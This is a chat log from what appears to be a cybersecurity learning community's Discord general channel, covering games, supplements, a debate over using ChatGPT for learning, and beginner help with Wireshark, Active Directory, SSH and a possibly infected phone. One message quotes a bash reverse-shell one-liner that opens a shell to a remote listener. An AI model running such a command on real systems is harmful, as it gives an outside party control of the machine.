#general

1 messages ยท Page 179 of 1

sick lance
#

It's from Overpass 2.

#

Please use #room-help for Tryhackme related questions.

bitter quiver
#

As a line to grind tree wise, a premium, or IRL?

quaint flint
#

okay

boreal scarab
bitter quiver
#

Base it on the vehicles around them. Both perform well. Abrams is a bit of a brawler, Leopard can have legendary turret resistance though hull down but isn't a brawler.

#

Both can still be one shot by one fast boi on the side

#

If you want to compliment your tank with something like the A-10 in CAS and come in for that brrr boi feeling

#

THen Abrams

#

Germany is more about dropping ordinance and getting out.

#

Between the twp 10.3 prems of the M1 KVT or the Leo 123, I love my leo more

boreal scarab
#

Bur am American ๐Ÿค”

quaint flint
#

@hasty sand whats up dude

bitter quiver
#

Well if it makes you feel any better half of the American mains aren't the brightest.

quaint flint
#

im so good and happy

bitter quiver
#

They had the worst win rate at top tier

#

@boreal scarab

quaint flint
#

cool

bitter quiver
#

Sup Cookie

quaint flint
#

i sit in cuba what about you?

bitter quiver
#

I sit in America. Cuba would be a blast to visit and have some coffee

#

And a proper cigar

quaint flint
#

@bitter quiver do you wil write with me privatly?

bitter quiver
#

Not at the moment no lol, if you linger around and become a functioning member of the community maybe lol

boreal scarab
bitter quiver
twin ridgeBOT
#

Gave +1 Rep to @boreal scarab (current: #31 - 248)

bitter quiver
#

Huh

bitter quiver
loud marlin
#

it's kinda hard to learn new skill =/

bitter quiver
loud marlin
#

when i read that lions mane fix things i cringe

quaint flint
#

im in cuba

loud marlin
#

mashroom

#

mushroom

#

or whatever eng word is

quaint flint
#

yes

bitter quiver
#

I also always poop like 30 minutes after my morning coffee

#

If I gave it up...not sure how I poop

loud marlin
bitter quiver
#

I use it to enhance my ADHD

#

lol

chilly veldt
#

sup sup

bitter quiver
#

Caffeine is also problematic for ADHD and should be avoided

#

But I simply embrace it to learn a new skin in afew days

loud marlin
#

i eat lions and cordyceps for years

chilly veldt
quaint flint
#

zombies

bitter quiver
amber wave
#

โ˜๏ธ I was not that off

jagged moon
chilly veldt
bitter quiver
#

Ah

loud marlin
#

mushrooms are rich with things. but nothing special. they can help in things or two... ADHD is brain thing and require medical attention, and that's why ppl can say that lions mane and so can help in adhd. cos it can't

jagged moon
#

Damnit you edited

chilly veldt
#

but caffeine is helpful to some people with adhd, including me, it makes me more focused and not full adhd as I normally am

jagged moon
#

I was about to joke about 10th cup

bitter quiver
shut hawk
bitter quiver
mossy river
shut hawk
#

sorry couldn't resist ๐Ÿ˜”

mossy river
#

I would be interested in reading more

loud marlin
bitter quiver
chilly veldt
#

depends on the person

quaint flint
#

SUBL

loud marlin
bitter quiver
chilly veldt
#

cite that?

bitter quiver
#

No citating needed

#

Also I've been a supplement representative for a company on one of the biggest forums back in my hayday

loud marlin
#

lie or not... if you are not sure what you thing to take you talk to doctor. special if you have some mental disorder or any brain/body issues

bitter quiver
#

Always talk with the doc

#

Mine knows what supplements I take, it's on file

#

Never know when that may come in handy in an emergency as well

#

Even supplements can have series interactions with medications a paramedic or the ER may use

loud marlin
# bitter quiver 100%

i had tons of "supplements" in my lab to test what it is... and they are not as they need to be...

bitter quiver
#

IT has what they say in it, but the amount is so tiny it can't fill a capsule

#

SO they add in filler

loud marlin
#

sadly im NDA bounded of not allow to say... thing i can is that they lie for sure

bitter quiver
#

Granted some things you dojn't need a whole lot of

#

You can still to this day go online and buy pro-hormones

#

Legally

#

And get buff as hell fast

loud marlin
#

and die

bitter quiver
#

ANd mess up your endocrine system for life as well

bitter quiver
loud marlin
#

thoes things are given to ppl under extra medical atention... ppl take things to easy...

#

as you say... you fuck you self for life

bitter quiver
#

Studied anabolic pharmacology for about half a decade and while some things are terrifying, especially methylated compounds like the old M1T that could obliterate your liver in a month, most pro-hormones are lighter and only a tiny% as effective. THey won't kill you. But they will cause lifelong issues

#

Most users will never get their original testosterone levels back after they stop

#

So they end up on TRT in their 30s

#

Granted some folks want that

upper bison
#

So how would you increase testosterone naturally?

bitter quiver
upper bison
#

Insteof of boosting it lol

bitter quiver
#

SOme arguments exist NOFAP

upper bison
mossy river
#

Please can we keep the topic professional and appropriate. This is still a workplace for many people.

bitter quiver
#

Sorry, and I actually meant that medically

loud marlin
upper bison
loud marlin
upper bison
#

lol

#

yes

bitter quiver
bitter quiver
#

It's fair to call out

upper bison
twin ridgeBOT
#

Gave +1 Rep to @bitter quiver (current: #391 - 12)

chilly veldt
loud marlin
bitter quiver
#

Personal trainer and if you are ever unsure have your doctor do a hromone levels test

#

But seriously. Eat, sleep, workout is it. Our bodies are designed to do their jobs

#

Supplements at best can give you 2-3% change

loud marlin
#

rly wish there is more education of not to do things

upper bison
loud marlin
upper bison
#

But yeah everyone has his own opinions and stuff

bitter quiver
#

Mods here are fair, they won't do thattype of stuff unnecessarily.

chilly veldt
upper bison
#

As long as we get alors we good

bitter quiver
sick lance
quaint flint
#

i won

mossy river
#

Hey @upper bison Can you keep your negative comments to yourself?
If you disagree with how this server is moderated, my DMs are open to any feedback.

But, if you want to make inappropriate comments towards any members of our team, you will be removed from the chat ๐Ÿ™‚
I will not tolerate any comments that are making community members uncomfortable, especially anyone in a minority.

upper bison
chilly veldt
bitter quiver
#

I had to learn everything on my own in the early 2000s

sick lance
#

You don't have to engage with us at all....

bitter quiver
#

The wild wild west

upper bison
#

Nice

sick lance
#

But I'd maybe read and take notes.

chilly veldt
#

my step dad in the early 2000s was a professional MMA fighter

loud marlin
upper bison
bitter quiver
chilly veldt
#

but yeah, I have grown up my whole life knowing and learning about nutrition, how it feels if you're low on something and how to do proper dieting/weight gaining, etc.

mossy river
rapid merlin
#

im really bad at pcap analysis. any tips/tricks? i have a pcap file that has the flag and can't bring myself to look through hundreds of lines of traffic. (redirect to appropriate room if needed)

sick lance
#

They have a few wireshark 101 rooms.

chilly veldt
#

lots of rooms

pliant cairn
#

Yup these rooms are real good.

loud marlin
#

i never was some hard fitness guy. but have fair amount of conversation with ppl who know what they talk and do. and they for sure can back up some of results that i do on work. that's why i say that ppl need ask doctor at best if wish to take some extra stuff for body

amber wave
#

learning wireshark on thm
good times

rapid merlin
#

yeah i have an account. been dreading the wireshark ones but yes yes I'll start there ๐Ÿ˜ฎโ€๐Ÿ’จ preciate it.

sick lance
bitter quiver
#

You can't learn how to sword fight without learning how to hold the sword

pliant cairn
#

Been quite a while. How are you all doing?

bitter quiver
amber wave
#

and do not skip while learning and take good notes

pliant cairn
bitter quiver
sick lance
#

I still have 'em boxed.

pliant cairn
bitter quiver
#

I need to sit down and actually play through Breath of the Wild

#

Own it but never had time for it yet due to other games

#

So little time in teh day after work and wife

sick lance
#

I'm glad they have the LoZ games on the Switch via GBA and SNES.

bitter quiver
#

Yeah that's a nice touch.

pliant cairn
#

Yup its really good. No other games have that spark that zelda has. But yeah no time to play true

bitter quiver
#

A packet is the encapsulated bit of data that is sent as part of a series from one node to another

#

I'd look at some networking rooms on THM

#

Before the hacking stuff

twin ridgeBOT
#

Gave +1 Rep to @bitter quiver (current: #365 - 13)

sick lance
#

This is a good THM room on packets and frames.

TryHackMe

TryHackMe is a free online platform for learning cyber security, using hands-on exercises and labs, all through your browser!

pliant cairn
#

Have a read on protocols. And osi model. After joining in an soc firm i learned the importance of these fundamentals is a huge W

mossy river
#

๐Ÿ˜ฌ we don't use ChatGPT to answer questions here

#

Ironically I was writing out a similar explanation just with more detail

#
Think of a package you order on Amazon.

Stamp/Delivery Service (Protocol, the type of postal service used to deliver the package, e.g., standard, express, corresponds to the network protocol used: udp/ tcp...)
Recipient's Address (Destination IP Address): The address of the person receiving the package.
Return to sender (Source IP Address): The address of the person sending the package.
Envelope/ Box (the packet itself is like the envelope or box that carries the data)
Package Contents (Payload The actual contents inside the package are like the data being transmitted)
wide marten
#

It's not ChatGPT but the model GPT4o, but okay. I don't see a reason to waste time when such explanations can be had in a fraction of the seconds, but so be it.

mossy river
#

It's not accurate and if you know the answer you should be able to write it out relatively easily.

quaint flint
#

hey

mossy river
#

We're fostering an environment wherein ChatGPT isn't used because most people just blindly copy and paste from it

wide marten
mossy river
#

If people start using it to answer questions, less people will actually check the message

sick lance
#

Where do you find GPT4o ?

mossy river
sick lance
twin ridgeBOT
#

Gave +1 Rep to @wide marten (current: #629 - 6)

wide marten
sick lance
#

It can also be wrong, in so many ways.

#

And confidently wrong.

#

You can choose the sources with search engines.

#

Do you also just choose the one source?

#

Which can funnily enough, also be wrong.

mossy river
#

It first writes from it's database, and then pulls the sources second

#

Source: I use ChatGPT a lot.

tidal quartz
#

Hey, is there a channel where ei can post about cryptography in general? I want to ask a question and idk if this channel is appropriate

tidal quartz
#

Alright, it's a few paragraphs though sorry if I flood the chat ๐Ÿ˜…

#

So I got this silly idea today, which turns out (imo) to be pretty cool. In an attempt to save your time: yes I won't roll my own crypto, and I know it's not a "good cipher"
With that out of the way, I was thinking of a transposition cipher where the characters of the plaintext (strictly works for the English alphabet without any numerical characters/symbols, old fashioned huh) are plotted in a 2 dimensional space where their X position is the letters position/index in the English alphabet and their Y position is the letters frequency (stolen from Oxford University ๐Ÿ˜‰).
And now the fun part which I have yet not figured out. My first approach was to somehow rotate the array containing the points which represent the letters by using some kind of smart magic number, that would produce a somehow appropriate result, but I'm not good at math so I put it away (for now). I also had the idea of literally rotating the points in a 2d space by using the
appropriate math formula obviously. The angle could be the number of rotations. After rotating the points there could be some mapping mechanism to translate the coordinates to letters.
I basically don't know where to go from here and need help. I don't want to give up to this idea and I won't. All help is appreciated โค๏ธ

sick lance
#

I love to eat me some strawrery.

#

But if you don't know the answer to something, would you not use a reliable source?

wide marten
#

The whole argument of reliability doesn't hold up. If I want to know what something means that implies I don't know myself. Whether GPT misinforms me or some article out there, makes no difference.

quaint flint
#

i can dox its me no matter and yes your a traitor

wide marten
#

I highly recommend using GPT (be it through ChatGPT or other means) to learn. If you don't know what something basic like packet means, there's an almost zero chance GPT gets it wrong. Certainly not bigger than Googling it and reading some random blog post that you have equally low chances to know whether it's correct or not.
What you do get is an answer within a second, no clicking arround, no cookie banners or popups, no loading times, no scrolling, no nonsense. Often with examples, tailored to the level you ask for (e.g. ELIF), with the option to ask follow ups. It's a fantastic tool.

pliant cairn
mossy river
#

In information security, we highly recommend researching.
It is an amazing skill to learn and there are a lot of niche topics that are really hard to get from ChatGPT accurately.

When you start to take short cuts, such as using ChatGPT, it does in fact negatively impact your ability to read an interpret resources. And further, it reduces your own internal knowledge base of accurate resources and go-to websites, i.e. hacktricks.

Difference between ChatGPT and using Google is one of them provides you with one resource whereas the other provides you with a range of resources, and most resources that do exist out there have a following of users verifying it.

mossy river
wide marten
#

Also if you don't understand how a line of code works or a certain command, ask GPT4. You're gonna get the same information you'd find clicking around in docs, but faster, with usage examples and added information.

wide marten
tidal quartz
mossy river
pliant cairn
sick lance
pliant cairn
#

But you cant do goodle dorking on gpt which is almost my primary way to search something up lol

wide marten
sick lance
#

Of course not, and don't pretend you will.

wide marten
#

Like if I don't understand how the basic reverse shell
bash -i >& /dev/tcp/10.0.0.1/4242 0>&1
works, I can google for an article that explains it, wasting time. Or I ask GPT4 which summarizes all that information out there, breaks it down into individual components and explains each. If that's not learning idk what is...

sick lance
#

You must have a slow internet connection if it takes you 5 min(s)

mossy river
#

You get quicker and there are places you find with amazing resources that you find by researching.
Just with any skill, practice makes perfect and if you stop doing something, you will naturally get worse at it over time.

sick lance
wide marten
mossy river
#

For the record, this is inaccurate, it's the first Google result ๐Ÿ˜

tidal quartz
#

I now got the idea to somehow merge the X,Y coordinates of the points and that value is then somehow mapped to a character

#

It's not really a transposition cipher now that I think about it though

uneven hound
#

So if I take notes here I'll become a hacker

#

hehe

#

i could not find the sus emoji

mossy river
#

Tells me to go to a link that doesn't work

wide marten
mossy river
#

So you're arguing for no reason at all?

shut hawk
#

Why would you choose a language model that isn't up-to-date and has no way of knowing what's right or wrong over the official documentation you can find in less than 5 seconds?

boreal scarab
#

@bitter quiver so you think Leopard 2 PL is better if I wanna EASILY grind the tree?

wide marten
boreal scarab
#

I got 2 tanks left of rank 3, then once that's done, going to be researching rank 4

shut hawk
pliant cairn
#

Wait, you guys play world of tanks?

tidal quartz
#

Unpopular opinion: do your research first and then ask LLM to simplify the parts of your research you didn't understand. This way you can most likely be assured that it's not pulling information out of its robotic ass because you are going to give it the parts you want simplified

tidal quartz
chilly veldt
#

ask it not to make up facts kek

sick lance
#

I tried looking for my screenshots of ChatGPT being wrong, oh well.

tidal quartz
sick lance
#

So many folders of screenshots ๐Ÿ’€

wide marten
shut hawk
#

LLMs are cool and definitely have their uses, but blindly following what it says without doing your own further research isn't a good habit to have, and can even be dangerous in some cases

sick lance
#

My point was proving sometimes ChatGPT is wrong, and confidantly wrong.

shut hawk
#

What do you think gpt is trained on?

sick lance
#

Found it.

wide marten
#

That's the current model.

sick lance
#

Those website you filter through can contain more information than ChatGPT will give you.

wide marten
#

To each their own, for me that answer would fully suffice.

naive violet
#

anyone saying googling yourself is much safer are deluding themselves Complete nonsense. When you have even a basic understanding of what a trustworthy source is, it's pretty easy.

shut hawk
#

Googling yourself is safer...you can filter out the resources you view...

sick lance
#

Then you're doing bad searching.

mossy river
#

I feel like this conversation is just going in circles

wide marten
mossy river
#

How about we move onto a happier topic, huh?

bitter quiver
mossy river
#

As I have mentioned previously, ChatGPT pulls the resources AFTER you ask it, not before.

chilly veldt
#

Love that my little brother is out developing some fun potential dad lore

shut hawk
tidal quartz
#

I will not ask to ask if yall promise not to laugh at me for being mathematically stupid in all ways

mossy river
#

Put all of this effort into a CTF and see who can do better ๐Ÿ˜Ž

pliant cairn
#

I really want to eat an ice cream right now lol.

bitter quiver
#

ANd it has no benefits for lower tier reearch

chilly veldt
#

Love that my little brother is out developing some fun potential dad lore

chilly veldt
mossy river
#

That's like me saying

"All bunny rabbits love cookies" and then Googling whether or not it's true and finding one single resource about a bunny rabbit liking cookies.

mossy river
chilly veldt
mossy river
chilly veldt
#

But he called me being like "you have a light running on battery? We out fishing next to you and staying overnight"

mossy river
boreal scarab
boreal scarab
# mossy river wait

Jabba, did you forget that you searched that?

Sorry to say, you do have alzheimers. AMpotatocry

mossy river
boreal scarab
mossy river
#

Because itโ€™s pulling the resource after making the statement and itโ€™s search query is bias

You canโ€™t make a statement and then try to find one resource that backs up your statement

#

You have to ask it to research first

#

โ€œDo strawberries grow on trees? Please provide a resource for your answerโ€

jagged moon
#

Confirmation bias, right?

tidal quartz
#

My approach is usually looking for resources that deny my statement.

mossy river
brisk tree
#

I'm confused as to what is going on

mossy river
chilly veldt
#

And 9/10 times it'll just generate a random url that might sound correct based on the next possible word

mossy river
#

How is everyone doing?

chilly veldt
wooden totem
#

chatgpt 4 is better, it actually has access to websites

tidal quartz
mossy river
tidal quartz
wooden totem
chilly veldt
mossy river
#

I have premium, itโ€™s someone to talk to ๐Ÿ˜”

tidal quartz
jagged moon
#

Pick a more divisive topic, like election falsification. It will pull sources for both depending on your query

#

Might take a few tries as it will warn you of inconclusiveness of stuff etc

#

But it's still dumb enough to let stuff slip

#

Don't outsource research to llm even if it can google

#

Exactly. And we usually don't ask gpt about stuff we know about. So be vigilant even when there are sources, is all

#

It will try to please you

brisk tree
#

I have arguments with ai all the time. Never pleases me

#

๐Ÿคฃ

jagged moon
#

You'd be surprised

#

People seek for reinforcement of their beliefs usually

#

Not proof that they are wrong

#

Yup. That's what confirmation bias is

#

Smartest people on the planet fall for it in research

#

It's normal

brisk tree
#

Tbh it's impossible to know everything so good to have something there just in case

jagged moon
#

so gotta be aware of it

wooden totem
#

Default chatgpt

jagged moon
#

Nah, when you do any research. Gotta stop and ask yourself if you are actively trying to confirm your initial idea. Not on purpose, but by accident

whole yew
#

Not just that, even when LLM is asked to provide references, it will sometimes make them up. Regardless of the truth of the response, if you cannot verify it, it does not have value.

#

Especially if one is not a domain expert in the field being asked about

jagged moon
#

Can't wait until llm is able to host a website to provide you a proof

boreal scarab
#

3 PM, didn't eat lunch or breakfast, and I'm starving, but too close to dinner. Sadge paradox

sick lance
#

Early dinner.

jagged moon
#

Cats gonna eat me

#

They act ultra hungry

#

But i fed them 30 min ago

sick lance
#

Cat just greedy.

#

My cat likes to try and con everyone out of food

brisk tree
jagged moon
brisk tree
#

๐Ÿคฃ

jagged moon
#

It's better with sound

#

Infuriating

sick lance
boreal scarab
#

@jagged moon

clear jackal
#

I just ate lunch

#

Ground beef bowl with a bunch of vegetables

boreal scarab
clear jackal
#

Nah, the afternoon coffee

#

Way better than beer

outer rivet
#

Hi

boreal scarab
wide marten
#

How about some football between old castle walls? โšฝ

clear jackal
#

Yeah, it's alright. I overcooked the beef and undercooked the peppers this week.

shut hawk
#

You mean rugby

mossy river
#

the entire rest of the world disagrees with you

blazing granite
boreal scarab
clear jackal
clear jackal
mossy river
blazing granite
young egret
#

congratulations steak

boreal scarab
shut hawk
#

btd6 goes hard ๐Ÿ”ฅ ๐Ÿ”ฅ

clear jackal
#

The only reason why the term soccer exists is because of the British

blazing granite
loud marlin
#

FYI mickey mouse is a rat

jagged moon
#

Not a mouse?

#

Mickey Misnomer

loud marlin
brisk tree
# sick lance

When I was in school my drama teacher said if she didn't feed her cats her cats would know valuable things off the units

sick lance
blazing granite
#

bruddd how are you?

blazing granite
loud marlin
#

idk that

blazing granite
#

mortimer is a rat

#

mickey is a mouse

brisk tree
#

But

sand trench
#

rugby requires no protective equipment that american "football" requires

#

hence rugby players are more bad ass

#

not to mention rugby does not lie about what it is compared to american "football" because you basically never kick the ball in american "football"

#

it would be like calling handball kick ball because sometimes the players accidentally kick the ball

clear jackal
sand trench
#

compared to football where you kick the ball all the time and the only time the ball is in the hands is if a goaly is holding it or it went out of bounds

proven quartz
neon stratus
#

Getting back into THM after a while of alert fatigue

proven quartz
clear jackal
#

Punter is now sad

neon stratus
#

Yea, I'm trying to complete some of the stuff I started a while back.

#

Thanks!

sick lance
#

Noted ๐Ÿ’ช

valid mauve
#

I feel dirty.

loud marlin
#

ello ello mac

valid mauve
#

Raleeeex!!

chilly veldt
#

macalack

valid mauve
#

(To avoid being strung up, rightfully: This is just to test if Stalker Gamma works better under W10)

deft cloak
#

@hollow pivot did you participated in Pre CTF of nahamcon? ๐Ÿ˜„

valid mauve
chilly veldt
#

feeling dead

valid mauve
#

Got any more good coffee for me?

chilly veldt
#

you?

valid mauve
#

Oh shite, why that?

chilly veldt
#

I might

#

I was outside all day yesterday and was overstimulated for 9+ hours

loud marlin
chilly veldt
#

my autism hated it

boreal scarab
#

Black rifle coffee!

valid mauve
chilly veldt
#

but it was pride!

#

and metal concert

valid mauve
#

Ah, that would certainly make it worthwhile.

#

What'd ya listen to?

chilly veldt
#

ye

#

some danish bands

#

I think

#

my head was dead when we did

#

so I don't remember anything

blazing granite
valid mauve
chilly veldt
#

I got work tomorrow

#

doing another 3-4 hours of cable management

sand trench
#

why is both defcon discord and tryhackme discord talking about cable management???

chilly veldt
#

cause it's amazing

mossy river
#

oopsie

chilly veldt
#

smh

mossy river
#

OOOPPSIEEE ๐Ÿ’… ๐Ÿ’… ๐Ÿ’… ๐Ÿ’…

#

Me when I information disclosure

chilly veldt
#

me when I want to just do fun open source programming, and find a big vulnerability ๐Ÿ’…

oak river
#

So let me paraphrase what I understood of AD:

  • Domain - the collection of people and machines in a business
  • Domain Controller - The device that allows the management of the domain and runs some services
  • OU - A hierarchical grouping of users and devices
  • Global catalogue - the place we search for all objects and services
  • Schema - Components that defines what device types we can manage and their attributes
    Is my understanding correct?
#

I would greatly appreciate if someone gives me a heads up, corrects me/add something

wide marten
#

Schema is much more than that. Most importantly you define a schema for users. You might want that in addition to all the default values you also store the tryhackme.com accounts of users. So you'd add such an attribute to the schema.

oak river
#

Yes, I did not manage to understand what exactly schema is

wide marten
#

From the microsoft docs: The Microsoft Active Directory schema contains formal definitions of every object class that can be created in an Active Directory forest.

One such object class would be Users, another one Computers. But there are many, many more.

oak river
#

So the schema is basically not some code or component, it is just a guide or the logic that explains what is what in AD?

wide marten
#

It's a template of sorts. Or if you know SQL, imagine the columns of a table.

oak river
#

Aha

wide marten
#

It defines which objects (can) exist and which properties these objects (can) have.

oak river
#

Doesn't AD have predefined ones that are default and cannot be changed?

#

But I think I understand the use of the schema

wide marten
#

Like for the User class these are some of the default attributes (another word for property): account-expires, country-name, department, display-name, employee-id, last-logon.

#

You could add an attribute favorite food to the schema and then you can store the favorite food of every User in your Active Directory Domain

oak river
#

By the way, they advised me to disable SSH password login into my devices

#

And instead using keys

wide marten
oak river
#

What is the best way to secure my devices against unwanted connection attempts, if I plan to enable remote ssh

oak river
tender pulsar
#

I need some help. I need a safe way to transfer important photos off of a phone that may have malware on it. The phone is a samsung S20+. My wife clicked a link in a scam email by mistake. Not something she would normally but it happens. The wifi was turned off and the phone was put on airplane mode. We got a new phone because it was in the works already and we didn't want to wipe the old phone and loose pictures and text messages from her dad that past last year. How can I safely get the photos off the phone without also transferring any possible malware?

oak river
#

Again, I love hearing multiple opinions

oak river
#

I have also accidentally clicked on advertisements and etc. on websites

mossy river
oak river
pallid lotus
#

Chances of a photo containing executable malware are slim to none...

oak river
#

Maybe it's not easy to run a virus using steganography? Or I am mistaken

#

Or steg is only used for hiding data in media

pallid lotus
#

And by slim I literally just mean if the software you use to view the image has a vulnerability in it

oak river
#

Does exif delete malicious code or only metadata?

pallid lotus
wide marten
oak river
#

And disabling passwords right?

oak river
#

Only with ID + Passphrase?

oak river
#

It is used for deletion of metadata

pallid lotus
#

exif is metadata lmao

oak river
#

yeah, was just wondering, ik it sounds stupid

sick lance
oak river
#

Im not an expert

pallid lotus
#

Oh, exiftool. Yeah, that just messes with the exifdata. Doesn't do anything to the image data.

oak river
#

I see

#

Btw hi Muiri

#

And hi to Jabba too

#

Also good night, have to go to bed as I have 6 hours to sleep until work

#

And thank you for everything to everyone

#

Appreciate the community work and guidance

mossy river
tender pulsar
mossy river
#

Best to transfer anything important first and then connect it to the internet and scan it

mossy river
pallid lotus
mossy river
#

Correct

pallid lotus
#

Phew

shut hawk
pallid lotus
# tender pulsar This is where my lack of knowledge in this area starts to show. am I risking the...

Chances of downloading something which actually compromises the device are reasonably slim. Chances of it being hidden in an image are even more slim. Chances of it working on both Android (?) and Windows (?) are minute. Chances of it working on both and being able to execute itself on the PC are basically zero.

You should be fine plugging the phone in, transferring the photos, then leaving it there.

pallid lotus
tender pulsar
jagged moon
shut hawk
pallid lotus
shut hawk
#

Webp moment

jagged moon
#

My first recommendation, use google photos or something for backup. That's what it's for, to not haul thousands of pics around

shut hawk
#

Google photos new AI feature looks interesting

jagged moon
#

My second one, is to skip windows as an intermediary completely

chilly veldt
jagged moon
#

Plenty of file managers like FX allow phone to phone connection. Via cable or wifi or bluetooth and do transfers. There is also quickshare in latest androids

#

Chance of having malicious picture if you transfer only DCIM and Pictures is ultra slim unless you are super targeted

jagged moon
tender pulsar
jagged moon
#

Google photos route allows you to skip all risks entirely

#

May need 2 bucks though

#

Deepnds on size

chilly veldt
#

you can also just do nearby share or bluetooth

tender pulsar
chilly veldt
jagged moon
#

It has a backup there. Uploads every photo to cloud

#

Like icloud

#

Uses google account storage. So it's limited. 2 bucks gets you 100 gigs

#

That's how i migrate pics to new phone these days. Instead of transferring them, i turn backup on before taking the phone to the factory reset

#

When you use the photos app on new device, all your library will be there

#

Bad part, google has all your pictures XD

tender pulsar
jagged moon
#

Good part, your storage is free, and you don't plug suspect phone anywhere

chilly veldt
#

there's wayyyy to low possibility for you to get your phone hacked

tender pulsar
jagged moon
shut hawk
#

The good days when you had unlimited Google photo storage โ˜น๏ธ

jagged moon
#

If you get hacked this way collect your 10k bounty from google

chilly veldt
#

like 0.4% chance for you as a normal person to get your phone hacked, especially via pictures

chilly veldt
#

numbers I made up, but you get the gist

tender pulsar
chilly veldt
#

well, I ain't allowed to say what I know ๐Ÿ˜„

jagged moon
#

And it's a nice service too

#

(so far)

tender pulsar
#

My only big question is there a risk letting the pnhone connect to my home network in order to upload the pictures to google?

shut hawk
#

^^

chilly veldt
#

no

jagged moon
#

But probably ok. Make a guest network for a day if you worried

#

Most modern routers support a guest wifi without access to LAN

shut hawk
#

My favourite feature of Google photos has to be the map

tender pulsar
shut hawk
#

Only a small portion of photos taken to our gsuite cloud have exif, but still really nice to see

jagged moon
#

Watch your google account activity too. In case it does something weird. But it should be ok

tender pulsar
chilly veldt
#

lmao

#

I got 5$ on nothing of that actually works

jagged moon
jagged moon
shut hawk
jagged moon
#

Unless your phone is rooted and you gave root perms to the malicious app

grim sparrowBOT
#

:hammer: cyberghost081#0 has been banned.

tender pulsar
jagged moon
#

Hence, watch activity

tender pulsar
#

cute cats

jagged moon
#

Can change pw after

#

And 2fa for overkill

tender pulsar
#

good point

jagged moon
#

Anything that had access will lose it

chilly veldt
#

too paranoid imo

golden timber
#

self-host immich

jagged moon
#

Well ye. We in paranoia mode

golden timber
#

for images

chilly veldt
#

if we go paranoia mode, then all old data is gone

#

at least mine

shut hawk
#

Admiring the cat photos

jagged moon
#

@tender pulsar in general you should be fine!

#

But if you wanna be safe safe, just in case. You know

tender pulsar
#

I wasn't until I saw in the news that a bunch of BMO customers had lost a bunch of money from bank accounts and she does our banking on her phone. Then I got a little more paranoid than usual.

jagged moon
#

Do all those things

jagged moon
north bronze
#

Hi guys iam in vulnversity room

#

I wanna know how to see how many ports are open. On this target

jagged moon
shut hawk
jagged moon
loud marlin
shut hawk
#

if (sleeping | eating) {
calm
} else {
attack
}

blazing granite
# loud marlin

that's a magic elixir that makes work tolerable ๐Ÿ˜‰ ๐Ÿ˜‚ ๐Ÿ˜›

jagged moon
chilly veldt
#

by the design looks

#

or old dell

shut hawk
#

But I think Bella is right with the HP or dell

jagged moon
#

I need a new laptop

#

Will probably buy out some lenovo from the company

#

Used business laptops are a steal

tender pulsar
#

I just got a lenovo gen 1 t14 a few months ago. I like it. It's a big improvement over the t430 I had before.

jagged moon
#

I think there are bunch of x1 carbons in the storage

tender pulsar
#

Those look like they would be nice.

jagged moon
#

Thin and good

tender pulsar
#

All the lenovos I have used have been very tough and well buld machines

chilly veldt
#

I got a t14s and thinkpad pro

shut hawk
#

The Latitudes are great

jagged moon
#

@chilly veldt u dutch, right?

chilly veldt
#

ouch

#

danish

jagged moon
#

Dammit

#

Potato potato!

chilly veldt
#

....

#

I would rather be called german

tender pulsar
#

sounds like fighting words haha

chilly veldt
#

or even norwegian

north bronze
#

Guys how many time takes to deploy a machine ???

jagged moon
#

Who is dutch besides dolphin

north bronze
#

Guys how many time takes to deploy a machine ???

jagged moon
#

Dolphin don't count

simple valve
chilly veldt
#

and if I take the big stretch.... swe ๐Ÿคข dish

simple valve
north bronze
chilly veldt
simple valve
tender pulsar
#

I am out everyone have a good day/night

jagged moon
tender pulsar
twin ridgeBOT
#

Gave +1 Rep to @jagged moon (current: #12 - 566)

crude stump
chilly veldt
#

When you are going to sleep and check up on your alarm phone and see there's 11 alarms laying for you when your shift starts tomorrow morning ๐Ÿ™ƒ

jagged moon
#

So you understand your mistake, right?

chilly veldt
jagged moon
#

No o

#

It's checking the phone!

sand trench
#

and timey whimey meepy moopy sleepy sloopy to the beepity boopity for shadow whadow to go for sleep sloops to the beep boops while they meep moops

slender current
#

I want to learn the C++ language. I have basics in the programming language. Should I learn programming from forums and read the codes written in forums and learn from them? Or that method is bad

jagged moon
#

The good method is whatever works best for you

#

If you have done this before on forums, sure

#

Otherwise, stick to more conventional ways

#

Or just start writing and learn as you go

slender current
#

but

crude stump
#

I donโ€™t

slender current
#

its like stack overflow

#

but i mean i want to learn from website like stack overflow

crude stump
#

Problem with that is most of the people who use forums ask questions about there code.

#

You could look at there code but itโ€™s not exactly teaching you how to do it

whole yew
#

IMO the best way to learn to code, is to start coding. Pick a simple project that YOU want to do and start writing code.

#

Reading code is a good way to encounter new ways of problem solving, but it doesn't actually make you better at solving problems.

jagged moon
# slender current but

That community looks devoted to roblox etc hacking. We don't condone that here so i removed your message. Please read the #rules when you have a moment

crude stump
#

Oh

#

Hm

#

Anyways

shut hawk
slender current
jagged moon
#

Hacking can be a lot of things. Ethical and unethical

crude stump
#

Gotta create a account tho

boreal scarab
formal swift
#

Hi

worn thorn
#

greetings

loud marlin
#

ello

molten sky
#

llo

blazing granite
#

lo

crude stump
#

o

loud marlin
blazing granite
#

toink, toink, toink

rapid merlin
#

Figured out the wireshark thing just so ya know lol spent way too long trying things turns out just ftp-data > extract object > open docx in libre. One useless rabbit hole that was cool is docx are zip archives?!

livid nexus
#

Google chrome is about to do another stupid thing

#

Manifest v3

#

Bitch move chrome

#

I switch to Firefox because of it

crude stump
#

I donโ€™t like google either

#

Well anything google tbh

livid nexus
#

When the frickin fbi tells you to put ad blockers so yeah I'm trusting them more than google

clear jackal
rapid merlin
#

First time lol

clear jackal
livid nexus
#

Wait till chrome does that and fire Fox booms in useg

#

Chrome Will be like: where did or user go?

slender current
#

Can anyone explain to me why the memory stores data temporarily and why the hard disk does not store it?

mossy river
#

Do you mean RAM?

shut hawk
#

reading and writing from RAM is much faster than to a hard disk

slender current
#

i didn't undersand buffer overflow

mossy river
#

So you know what the stack is?

slender current
#

Why is there a feature in C++ that stores 6 bytes in memory?

slender current
mossy river
#

Help the channel grow with a Like, Comment, & Subscribe!
โค๏ธ Support โžก https://j-h.io/patreon โ†” https://j-h.io/paypal โ†” https://j-h.io/buymeacoffee
Check out the affiliates below for more free or discounted learning!
๐Ÿ–ฅ๏ธ Zero-Point Security โžก Certified Red Team Operator https://j-h.io/crto
๐Ÿ’ปZero-Point Security โžก C2 Development with C# https://j-...

โ–ถ Play video
crude stump
livid nexus
#

Same

crude stump
#

But idk how private it says it really is

slender current
mossy river
# slender current no

When it comes to Buffer Overflow, you need to start low down and understand how a computer executes porocesses before you go in and do BoF.

mossy river
#

That video explains it pretty well ๐Ÿ™‚

crude stump
#

Processes?

slender current
#

